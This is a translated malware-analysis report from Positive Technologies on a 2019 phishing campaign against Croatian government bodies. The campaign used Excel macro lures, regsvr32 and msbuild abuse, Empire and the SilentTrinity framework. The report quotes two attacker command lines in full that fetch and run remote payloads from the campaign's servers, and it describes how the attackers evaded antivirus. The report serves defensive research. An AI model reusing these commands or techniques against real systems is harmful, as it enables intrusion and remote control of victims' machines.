IronPython on the side of evil: how we opened a cyber attack on civil services in a European country

Our experts from the expert security center always keep abreast of and watch for the emergence of new interesting and dangerous threats. That is how, at the beginning of April 2019, a targeted attack on the Croatian state authorities was discovered. This report describes the chain of delivery of malware to the victim's computer, presents indicators of compromise, and also noted the use of a new post-operating framework, which, according to our data, has never been used by hackers before.

Victim infection

On April 2, 2019, during the routine monitoring of various resources for new malware, experts from PT Expert Security Center discovered an unusual office document.
')


Figure 1. Malware

The dispatch notification was created in MS Excel office application and saved in the old XLS format a day before (2019-04-01 16:28:07 (UTC)). However, the current time stamp on the seal (2018-07-25 00:12:30 (UTC)) indicates that the document was used as early as 2018. We will return to this indirect feature below.

It is noteworthy that the “Comments” field (which can also be changed using MS Excel tools) contains a command in the Windows command interpreter language:

cmd.exe /c echo Set objShell = CreateObject("Wscript.Shell"): objShell.Run "net use https://postahr.vip", 0, False: Wscript.Sleep 10000: objShell.Run "regsvr32 /u /n /s /i:https://postahr.vip/page/1/update.sct scrobj.dll", 0, False: Set objShell = Nothing > C:\users\%username%\appdata\local\microsoft\silent.vbs 

Figure 2. Comments field with suspicious content



Figure 3. The contents of the "Comments" field in binary form

As a result of this command, the system creates a script in Visual Basic, which at startup will perform the following actions:

• connects a network resource using WebDAV technology,
• will download and run the file of the next stage of infection using the legitimate system utility regsvr32.

When a network resource is connected via the HTTP (S) protocol, an NTLM request is sent to the attacker's server, with which the NTLM hash can be restored. The resulting hash can then be used to authorize services on behalf of the victim. We did not find traces of such attacks, and the reasons for connecting to a network resource remain unclear.

The technique of using the regsvr32 program (ActiveX control elements) for malicious purposes is not new and even has a name - Squiblydoo. Attackers use it to meet the requirements of monitoring the launch of trusted programs, as well as to bypass antivirus detection.

By itself, the text in the "Comments" field is harmless, and its execution must be due to something. When the victim opens the received Excel document, a trap message in Croatian will appear, prompting the inclusion of macros:



Figure 4. Message trap after opening a document

If the execution of macros is allowed, the user will see a fake notification of sending with the Croatian mail logo:



Figure 5. False Parcel Notification

Meanwhile, the macro of the “Comments” field script will be executed, and the script created in the system will be added to the autoload:



Figure 6. Macro key logic

It is curious that the script created is not run by the macro. Perhaps this is the attacker's idea: the next stage of infection will occur after the system is rebooted and the user logs on. We will return to this detail below.

Part of the script is interesting in its own way: a neat code structure with formatting, indents, and other nuances of markup can be a sign of using third-party code and even a program that allows you to create such documents automatically.



Figure 7. Presumably borrowed part of the macro

Searching for keywords provides many similar parts of the code on different resources. We are inclined to the version that the hacker just found a suitable program code and slightly corrected it to perform the actions he needed:



Figure 8. Example of a similar macro on issuu.com



Figure 9. An example of a similar macro on stackoverflow.com



Figure 10. Example of a similar macro on dummies.com

Let us return to the next stage of infection by means of the regsvr32 utility. When executing a command, the update.sct scriptlet in JavaScript will be downloaded from the attacker's server. The script body contains binary data encoded by the Base64 algorithm. After decoding, the data will be deserialized and executed by means of the .NET Framework software platform.



Figure 11. Scriptlet update.sct downloaded from the attacker's server

It should be noted that this code was borrowed by the attacker on one of the publicly available resources:



Figure 12. Sample code similar to rastamouse.me



Figure 13. An example of similar code on github.com

It is unlikely that the hacker thoroughly delved into the logic of the tools used. For example, in the considered scriptlet, the setversion function is called, which does nothing. One of the examples available on the web looks the same.

The unpacked and running object is an executable PE file on the .NET platform.



Figure 14. The header of the executable PE file



Figure 15. SharpPick PE file debug information

As a result of the compilation, the path to the project with the source code was preserved. The suffix -master says that the project was previously cloned from the repository, and the SharpPick catalog leads to a well-known application that allows you to download and execute PowerShell code without using the language interpreter directly, but using the .NET dependencies.
Despite the availability of the SharpPick utility project on GitHub, you should make sure that no significant changes have been made.



Figure 16. Part of the decompiled SharpPick utility code

As a result of decompilation, pseudo-code was obtained, during which it is decoded from Base64 and the PowerShell script is run:



Figure 17. Partially converted PowerShell script

After simplifying the code, it is easy to parse its logic:

• An object is created to interact with the web server with the specified values ​​of User-Agent, Cookie and proxy settings;
• load payload at the specified address;
• the result is decrypted by the RC4 algorithm using the specified key and run.

Unfortunately, during our research the managing server was already unavailable. We could not find the data that had been obtained from it earlier. However, this time there is enough information on the Web (example: a report from our colleagues from FireEye ) to unequivocally establish: the final link in this chain of infection is the Empire backdoor, a tool for remote administration of the victim’s computer as part of the Empire Framework framework.



Figure 18. Using a similar PowerShell script in attacks against a WinRAR vulnerability

Interestingly, other script patterns lead to an extensive article on penetration testing techniques, with particular attention to hiding the infrastructure of the attacking proxy servers. The most likely source of information used by the attacker is an article by colleagues from Payatu Technologies, where they provide detailed instructions on redirecting sessions to legitimate resources, blocking unwanted packets, logging, and so on, including using Empire.

A few hours later we found another document about the package. It has many similarities with the previous one: it is also found in Croatia (2019-04-02 16:52:56 (UTC)), it has the same name and even a trap image of the received parcel. But still there are differences.

The malicious code is again located in the Comments field, but this time the action logic is changed.

 cmd.exe /c echo Set objShell = CreateObject("Wscript.Shell"):objShell.Run "C:\windows\system32\cmd.exe /c net use \\176.105.255.59\webdav",0:Wscript.Sleep 60000: objShell.Run "%windir%\Microsoft.Net\Framework\v4.0.30319\msbuild.exe \\176.105.255.59\webdav\msbuild.xml" , 0, False: Set objShell = Nothing > C:\users\%username%\appdata\local\microsoft\silent.vbs 

• The network resource is connected using the SMB protocol.
• Download and run the next stage of infection using msbuild, the legitimate utility of the .NET Framework package.

It is curious that the address of the mounted directory contains the string webdav, which indirectly connects this case with the previous one. This time the attack on the NTLM hash is still possible, although there is no evidence of its use. Again, a legitimate application is used to successfully bypass the restriction of launching third-party programs (this time msbuild). Before we describe the technique of abuse, we mention the differences in the program code of the macro of the new document.

The attackers did not make significant changes to the logic of the VBA script. But it is worth noting that this time they not only provide automatic loading of the VBS-script being created in the system, but also launch it at the moment of opening the document. Most likely, in the previous case, the attackers simply forgot about it, and after a while, having discovered an oversight, corrected it in a new version of the document.



Figure 19. Macro code comparison in two documents

The next stage of the infection is an XML document containing C # program code. The utility feature msbuild allows you to compile and run the contained code on the fly, as evidenced by the comments left by the hacker at the beginning of the markup.

The code again presents the Base64 buffer, which will be decoded, decompressed by the Deflate algorithm and launched. We believe the reader already guesses that this time the attacker took advantage of the freely accessible template, as evidenced by the comments mentioned and many sources on the Web with the same code.



Figure 20. The msbuild.xml task downloaded from the attacker's server

As a result, this time the PE file on the .NET platform will be loaded and executed into memory. And the debug information contains not only a sign that the project was compiled on a virtual machine (perhaps in order to hide information about the attacker), but also the SILENTTRINITY directory, which we will discuss in more detail.



Figure 21. Debugging information of PE SILENTTRINITY file

After studying these two documents about the package, we found two more. Both the file format, the name, and the trap picture with the specified region remained unchanged. Documents were available at the end of August 2018, which confirms the hypothesis about the long-term campaign, which we wrote about at the beginning of the report.

It is curious that last year the hackers did not use the “Comments” field, however, they used legitimate utilities. The malicious component was loaded using the certutil utility for working with certificates and performing cryptographic operations, and the launch was provided with the WMI management toolkit:



Figure 22. Comparison of document macros in 2018

Unfortunately, we did not manage to establish the subsequent links of the 2018 attack chain beyond the limitation of the incident.

It is also worth noting that part of the code of the VBA script remained unchanged, with the exception of deleted auxiliary comments explaining the logic of operation.



Figure 23. Comparison of macros for 2019 and 2018

SilentTrinity framework

Search output on the SILENTTRINITY keyword from the debug information of the PE file allows you to easily determine the origin of this link of attack. In October 2018, Marcello Salvati (a researcher at Black Hills Information Security) posted a project called SILENTTRINITY on the popular GitHub repository. The basic idea: to use the flexibility and advantages of the well-known post-operating PowerShell framework in the Python scripting programming language, namely IronPython. The project is developing to this day.

We will not go into details of the work and implementation of the project (especially since the author described it in detail in his report ). We will cover only the basic logic of the work and interesting points in the implementation.

After starting the PE file (however, the intermediate link may be in a different format) the following happens:

• referring to the management server to download the ZIP-file with the necessary dependencies and the main script in Python;
• the contents of the archive is extracted without saving to disk;
• Dependencies are registered for successful processing of Python scripts;
• the main Python script is launched, waiting for the task from the attacker;
• each task is transferred in the form of a ready-made Python script;
• the task is performed on the side of the victim in a separate thread;
• The result of the work is transmitted back to the management server.

Figure 24. SilentTrinity framework

Of the features worth highlighting the following:

• IronPython support, including the Boo language (a subset of IronPython with strong data typing).
• All activity does not require disk space: dependencies, scripts, tasks are located in memory (fileless-attack).
• Archive with dependencies, tasks, the result of the teams - all communication between the victim and the hacker is encrypted with the AES algorithm.
• The shared key is formed by the Diffie - Hellman protocol.
• Network transport is provided at the HTTP (S) protocol level with proxy support.

Figure 25. Example of the user interface of the server part of the SilentTrinity framework

Interestingly, on the day of the attacks, the PE loader was downloaded to the VirusTotal service, where no anti-virus vendor detected it as malicious. There is nothing surprising in this: firstly, the binary file does not fall on the disk, and the signature detection does not make much sense; secondly, static detection is far from the only user protection technology.



Figure 26. Result of scanning the SilentTrinity bootloader on the day of the attacks

In addition, a few days after the attack, the detection verdicts did begin to appear. It is important that in the period of attacks either defenses were not yet equipped with detection algorithms, or the threat was not known in principle.



Figure 27. Actual scan result of the SilentTrinity bootloader

Most likely, this was the reason for choosing this solution for carrying out attacks. We have no information that the SilentTrinity framework has already been used in malicious attacks earlier.

Infrastructure used by attackers

It is worth mentioning that the network infrastructure used by hackers is chronologically related to the ongoing attacks.



Table 1. Information about the used domains as attacking servers


Domains were created in such a way as to be similar to legitimate attacked resources. This allows you to gain the trust of users when conducting phishing attacks. Note that the resources affected are not limited to Croatia.

All domains are registered using WhoisGuard security technology. It allows you to hide real domain registrant information for spam protection, while attackers use this technology to anonymize.

Servers that distribute and manage malware have been rented from the Dutch provider Breezle.

All available information about nodes, addresses, domains of attackers with a multitude of connections between them allows us to judge about the large amounts of malware that the attackers had this time. We do not exclude that the campaigns could have used similar tools considered and some cases of infection remained undisclosed.



Figure 28. Graphic representation of the attacker's infrastructure

Conclusion

A day after the discovery of documents in the news , a press release came out with reference to the Croatian Information Systems Security Department on targeted phishing attacks. Traces were found in several state bodies of the country. It is reported that e-mails were sent to victims with a link to a phishing site from which it is proposed to download the malicious document from which our analysis began. This fills the missing links in the chain of attacks, and in the end we would like to draw attention to the methods of protection that can reduce damage from such attacks:

• Monitoring and controlling the use of certain trusted programs (certutil, regsvr32, msbuild, net, wmic ...)
• Checking and analyzing not only email attachments, but also web links
• Periodic scanning of PC memory in the corporate network
• Successful connections with C2 Silent Trinity (even under TLS) can be detected using PT Network Attack Discovery , besides, we have published detections for the community in our repository.

Author : Alexey Vishnyakov, Positive Technologies

PS On this topic, the author also read a report at the Positive Hack Days 9 conference. Videos of this and other speeches are available at: www.phdays.com/ru/broadcast/ .